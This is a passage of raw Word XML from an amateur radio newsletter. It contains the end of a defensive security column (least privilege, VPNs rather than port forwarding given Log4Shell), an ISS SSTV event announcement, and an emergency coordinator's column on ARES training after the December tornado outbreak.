                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3705225" cy="3275965"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3705225" cy="3275965"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="31" name="Picture 31"/>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0" y="0"/>
                            <a:ext cx="3705225" cy="2828925"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="33" name="Text Box 33"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="2886075"/>
                            <a:ext cx="3705225" cy="389890"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="19444BA1" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="00635FC5" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
                              <w:pPr>
                                <w:pStyle w:val="Caption"/>
                                <w:rPr>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t>That’s a lot of “potentially” vulnerable devices</w:t>
                              </w:r>
                              <w:r>
                                <w:br/>
                                <w:t>(</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00AB46B1">
                                <w:t>Kevin Beaumont @GossiTheDog)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20886E7" id="Group 30" o:spid="_x0000_s1032" style="position:absolute;margin-left:227.6pt;margin-top:9.05pt;width:291.75pt;height:257.95pt;z-index:253009920" coordsize="37052,3275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">
                <v:shape id="Picture 31" o:spid="_x0000_s1033" type="#_x0000_t75" style="position:absolute;width:37052;height:28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">
                  <v:imagedata r:id="rId36" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 33" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;top:28860;width:37052;height:3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" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="19444BA1" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="00635FC5" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
                        <w:pPr>
                          <w:pStyle w:val="Caption"/>
                          <w:rPr>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t>That’s a lot of “potentially” vulnerable devices</w:t>
                        </w:r>
                        <w:r>
                          <w:br/>
                          <w:t>(</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00AB46B1">
                          <w:t>Kevin Beaumont @GossiTheDog)</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>Services and applications need to be run with least privileged accounts, non-root and non-administrative accounts.  This is my gripe about many projects that run all as root and do not take the time to understand or figure out least-privileged permissions.  Vulnerabilities certainly can and do exist anywhere humans have written a line of code or run a command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444AF47" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">I especially recommend not port forwarding from the public Internet due to reasons such as the ease of exploiting Log4Shell or any other trivially exploitable vulnerability yet to be discovered.  Devices like video cameras or other IoT that require access by a few individuals should be setup with a tunnel using a private link VPN.  Router and SD-WAN (software defined networking) technologies such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>OpenWRT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">, DD-WRT, Tomato, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>pfSense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>OPNsense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>Zerotier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">, a Pi, or any other number of technologies that can establish a secure point-to-point tunnel eliminates exposure of devices to the Internet. Plenty of tutorials exist showing how to setup OpenVPN or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>Wireguard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> on consumer-based routing devices.  There is absolutely no need to have random IoT devices on the Internet open to exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A052338" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">To make matters worse, I have found ham radio devices such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>OpenSpots</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> and Pi-Stars on the Internet – some with default passwords.  DO NOT DO THIS (either)!  These devices are setup with direct access from the Internet.  Why? Users think it’s convenient.  Convenience is the enemy of security.  Some probably were setup with temporarily access from the Internet and never had that removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0224C888" w14:textId="4257376A" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">It is mostly unrealistic to host a web or other service for hundreds or thousands of users, requiring each to configure a VPN.  A Pi-Star or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>AllStar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> node setup for club members to control would be an example.  Devices hosting such services should be isolated in a proper DMZ, updated frequently, use encryption and strong passwords.  For plenty of security tips and tricks, check out my </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>October 2020 article</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582DAAD3" w14:textId="26F5B7E0" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253010944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48070EBD" wp14:editId="6B0792BB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>19050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>319405</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3086100" cy="2425065"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="34" name="Group 34"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3086100" cy="2425065"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3295650" cy="2868295"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="35" name="Picture 35"/>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0" y="0"/>
                            <a:ext cx="3295650" cy="2553970"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="36" name="Text Box 36"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="2609850"/>
                            <a:ext cx="3295650" cy="258445"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2538C709" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="005F73AD" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
                              <w:pPr>
                                <w:pStyle w:val="Caption"/>
                                <w:rPr>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t>R</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00AB46B1">
                                <w:t xml:space="preserve">eceived at the K8JTK shack during the June 2021 </w:t>
                              </w:r>
                              <w:r>
                                <w:t xml:space="preserve">ISS </w:t>
                              </w:r>
                              <w:r w:rsidRPr="00AB46B1">
                                <w:t>SSTV event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8070EBD" id="Group 34" o:spid="_x0000_s1035" style="position:absolute;margin-left:1.5pt;margin-top:25.15pt;width:243pt;height:190.95pt;z-index:253010944;mso-position-horizontal-relative:margin;mso-width-relative:margin;mso-height-relative:margin" coordsize="32956,2868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">
                <v:shape id="Picture 35" o:spid="_x0000_s1036" type="#_x0000_t75" style="position:absolute;width:32956;height:25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">
                  <v:imagedata r:id="rId39" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 36" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;top:26098;width:32956;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" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2538C709" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="005F73AD" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
                        <w:pPr>
                          <w:pStyle w:val="Caption"/>
                          <w:rPr>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t>R</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00AB46B1">
                          <w:t xml:space="preserve">eceived at the K8JTK shack during the June 2021 </w:t>
                        </w:r>
                        <w:r>
                          <w:t xml:space="preserve">ISS </w:t>
                        </w:r>
                        <w:r w:rsidRPr="00AB46B1">
                          <w:t>SSTV event</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">If you’re reading this before the end-of-the-year, there is still time to participate in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ARISS SSTV event</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t>.  The International Space Station will be sending Slow Scan TV images starting Dec 26 about 18:25 UTC and ending Dec 31 about 17:05 UTC.  These times are, of course, planned and subject to change based on crew schedules and availability.  These events generate a lot of buzz and interest in SSTV and ham radio in general.  If you don’t have a satellite tracking station, using an outdoor omni-directional antenna, an HT with ¼ wave whip, or even better a hand-held directional (like ones used for foxhunting) will work for receiving signals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFF3AF1" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">All you need is a receiver tuned to 145.800 MHz FM, software to decode signals such as: </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>MMSSTV</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> on a PC (</w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>I also have getting started instructions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>DroidSSTV</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> for Android or </w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>SSTV</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> for iOS.  Satellite tracking programs </w:t>
      </w:r>
      <w:r w:rsidRPr="007A6C3F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">such as: </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Gpredict</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Nova</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> on the PC, </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>AmastDroid</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve">, or websites like </w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>N2YO</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="007A6C3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>AstroViewer</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="007A6C3F">
        <w:t xml:space="preserve"> track the position and offer predictions of upcoming passes.  When the ISS is nearly over head, start receiving images!  The ARISS link above has information on uploading images for a QSL or for an award.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C851BAC" w14:textId="77777777" w:rsidR="00FF0FF5" w:rsidRPr="007A6C3F" w:rsidRDefault="00FF0FF5" w:rsidP="00FF0FF5">
      <w:r w:rsidRPr="007A6C3F">
        <w:t>Thanks for reading. Happy New Year! 73… de Jeff – K8JTK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600A3E23" w14:textId="5C80EF51" w:rsidR="00A87275" w:rsidRDefault="00A87275" w:rsidP="00A87275"/>
    <w:p w14:paraId="170AB158" w14:textId="40C6A291" w:rsidR="00A34760" w:rsidRDefault="00A34760" w:rsidP="00A34760">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5764B4" w14:textId="6BB2574C" w:rsidR="00A34760" w:rsidRDefault="00054CC7" w:rsidP="00A34760">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>___________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0AB0CC" w14:textId="77777777" w:rsidR="00054CC7" w:rsidRDefault="00054CC7" w:rsidP="00A34760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49CD33B9" w14:textId="77777777" w:rsidR="00054CC7" w:rsidRPr="00054CC7" w:rsidRDefault="00054CC7" w:rsidP="00054CC7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="sec"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidRPr="00054CC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252907520" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="434843D8" wp14:editId="465F99CC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>48895</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2905760" cy="2179320"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21336"/>
                <wp:lineTo x="21524" y="21336"/>
                <wp:lineTo x="21524" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="24" name="Picture 24" descr="A picture containing text, in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text, indoor, person&#10;&#10;Description automatically generated"/>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905760" cy="2179320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00054CC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>From the Section Emergency Coordinator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60461E77" w14:textId="77777777" w:rsidR="00054CC7" w:rsidRPr="00FD0EAD" w:rsidRDefault="00054CC7" w:rsidP="00054CC7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD0EAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>Stan Broadway, N8BHL - SEC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0BA866" w14:textId="77777777" w:rsidR="00054CC7" w:rsidRDefault="0084211F" w:rsidP="00054CC7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidR="00054CC7" w:rsidRPr="00745B57">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>broadways@standi.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00054CC7" w:rsidRPr="00FD0EAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27915A1B" w14:textId="77777777" w:rsidR="00054CC7" w:rsidRDefault="00054CC7" w:rsidP="00A34760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DA75E6C" w14:textId="656BAF94" w:rsidR="000E77ED" w:rsidRDefault="000E77ED" w:rsidP="000E77ED"/>
    <w:p w14:paraId="6F3BAC49" w14:textId="5F4D5F75" w:rsidR="008126B3" w:rsidRDefault="008126B3" w:rsidP="000E77ED"/>
    <w:p w14:paraId="6EDE93CA" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:t xml:space="preserve">Ohio ARES –  Things new, things revived </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD8AB16" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30"/>
    <w:p w14:paraId="72284AD3" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:t xml:space="preserve">I have a new project for you!   I have heard often (and recently) seasoned hams say things like, “We don’t have disasters here,” and “Call me if you need me but I don’t need that silly training.”   I see hams who skip training meetings because they don’t need to go over that same stuff again.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECB66C8" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30"/>
    <w:p w14:paraId="2C32D050" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:t xml:space="preserve">Do I need to say anything more than just, “Kentucky” at this point to disprove those comments? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346E55BE" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30"/>
    <w:p w14:paraId="07DC3B36" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>I get it.</w:t>
      </w:r>
      <w:r w:rsidRPr="003817B7">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D82A49" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:t xml:space="preserve">I racked up 50 years in emergency service before finally putting the fire boots away. I don’t know how many times I have been through “refresher” classes of some sort. But you know, EVERY time I managed to learn something, or I discovered that over the years I’d turned some concept sideways.  Every time I emerged better able to do my job and keep others (and myself) alive.  I also learned in the 1980’s that if I wanted to get in on “the big one” I had better respond ~every~ time the alarm sounded because there was no difference in the basic alarm one over the other. And you know, the more “little ones” I ran on the better I got when the big one came around; the better I could function under NIMS and Incident Command; the more my crew knew they could depend on me; the better I could serve my department and my neighbors! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDAF7AE" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30"/>
    <w:p w14:paraId="645C9AC9" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:t xml:space="preserve">If you’re reading this you are already showing that you’re interested in providing service through amateur radio, and I commend you for that! I can’t thank you all enough for the time you invest.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAB0349" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30"/>
    <w:p w14:paraId="6EA9E16E" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:t xml:space="preserve">Now- my project for you: work to make it better.  Take some of your time to help, now before the help is required.  Pretty simple concept but it applies evenly across the board- from the newest ham to the old head with years of experience working disasters. New hams need to hear from the old heads how it was when they had the big one.  If the old heads aren’t around anymore, how are they to hear?  So please consider not letting all your years of service go to waste- stay involved, get re-involved, and kick the “rookies” into shape (figuratively, of course.) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063A37F8" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30"/>
    <w:p w14:paraId="0281D414" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:t xml:space="preserve">We never know when…but we know at some time it will come.  The December 10-11 tornado outbreak was not a surprise. The Severe Storms Forecast Center began alerting the Midwest early that severe storms were likely </w:t>
      </w:r>
      <w:r w:rsidRPr="003817B7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">in the overnight period.  The danger stretched from near the Gulf all the way to the Ohio Valley.  One historic tornado ran on the ground across four states for around 250 miles- setting historic records as it destroyed a vast area of several states.  Around 91 people were reported killed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B1B278" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56F41CED" wp14:editId="6E068B0F">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="63" name="Picture 63" descr="A picture containing ground, outdoor, old, brok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A picture containing ground, outdoor, old, broken&#10;&#10;Description automatically generated"/>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41189012" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30"/>
    <w:p w14:paraId="665BD149" w14:textId="77777777" w:rsidR="00EA6E30" w:rsidRPr="003817B7" w:rsidRDefault="00EA6E30" w:rsidP="00EA6E30">
      <w:r w:rsidRPr="003817B7">
        <w:t xml:space="preserve">Ohio’s elite Task Force 1 was among the Search and Rescue (SAR) teams called to stricken parts of Kentucky to help search for victims. </w:t>
      </w:r>
    </w:p>
